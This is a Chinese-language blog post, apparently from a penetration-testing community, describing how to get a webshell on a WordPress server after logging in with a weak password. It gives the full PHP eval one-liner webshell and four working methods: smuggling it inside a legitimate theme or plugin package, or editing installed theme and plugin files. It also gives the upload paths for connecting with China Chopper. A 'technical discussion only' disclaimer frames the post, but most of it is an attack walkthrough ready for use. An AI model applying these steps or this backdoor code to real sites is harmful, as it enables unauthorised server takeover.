技术讨论 | WordPress后台拿Shell新姿态

	*严正声明，本文仅限技术讨论，严禁用于其他用途。 前言 笔者在一次挖洞过程中，发现了目标C段里存在一台有WordPress程序的服务器，当时看页面内容还是默认状 态，因此尝试了一下弱口令，成功进入后台。为了扩大战果，因此想拿到服务器权限，于是去网上找了一些关 于wordpress后台拿shell的相关方法。 笔者把网上方法汇总了一下： 1、本机建立目录“heimian”,把一句话1.php放进去。打包heimian目录为zip文件。 WP后台的主题管理，上传主题，安装； 2、编辑模板/404拿shell； 3、在WordPress管理页面的左边单击“媒体”-“新增媒体案”，接着就会出来一个上传的界面 在该界面中选择“Browser 上傳功能”，直接选择php的Webshell上传即可； 4、编辑已安装的插件插入一句话木马 搭建环境以及所需工具 物理机win10 +phpstudy 2016 菜刀一句话木马代码如下，并保存为ma.php： <?php @eval($_POST['code']);?> 复制代码 这里笔者以最新版WordPress程序测试。 一些尝试 以下是我使用网上说的一些方法做的一些尝试 下图是直接在媒体库直接上传php文件，可以看到在新版本中不能这样操作了。 下图是直接在插件处直接上传php，也无法上传。 下图是在本地新建ma目录后，把一句话文件放到ma目录下然后压缩得到的压缩包ma.zip。 下图是ma.zip，也无法正常上传 总结 可见网上很多文章，发表的时间已有一些年头，WordPress已经慢慢完善了下面是笔者自己测试成功拿S hell的四种方法。目前，笔者就尝试了这几种方法拿shell，若有其他奇葩思路，欢迎补充。 方法一:夹带主题包拿shell法 既然网上说的把PHP文件直接或间接的压缩到zip文件中行不通，那笔者就在完整的主题包中夹带自己的一句话木马。 首先去网上下载一个免费的主题，途径如下图所示： 下图是把一句话木马文件直接压缩到下载的主题包里： 下图是把修改过的主题包上传上去： 上传成功后，我们可以通过访问/wp-content/themes/[主题名]/[一句话木马文件名]通过菜刀我 们成功可以成功连接上去。 方法二:夹带插件拿shell法 根据上面的思路，我们也可以通过把木马夹带在完整的插件包中上传拿shell下载插件 的地址：https://wordpress.org/plugins/ 笔者就以下图这个插件为例，把一句话木马也压缩进去。 然后上传上去 启不启用都是可以的，只要解压缩了之后，都是可以的。 最后，只要访问/wp-content/plugins/[插件名]/[一句话木马名]用菜刀连接即可。 方法三：编辑主题拿shell法 这种方法流传于网上挺久的，也非常的有实用性。 进入后台——外观——编辑——在右侧选择php文件——在PHP文件中添加一句话木马后更新 然后用菜刀连接/wp-content/themes/[主题名]/[修改文件的文件名]即可。 编辑404页面拿shell也是如此，只不过不能通过连接不存在的php文件连接一句话木马。 方法四：编辑已安装插件拿shell法 编辑已经安装的插件的PHP文件。 然后访问连接即可。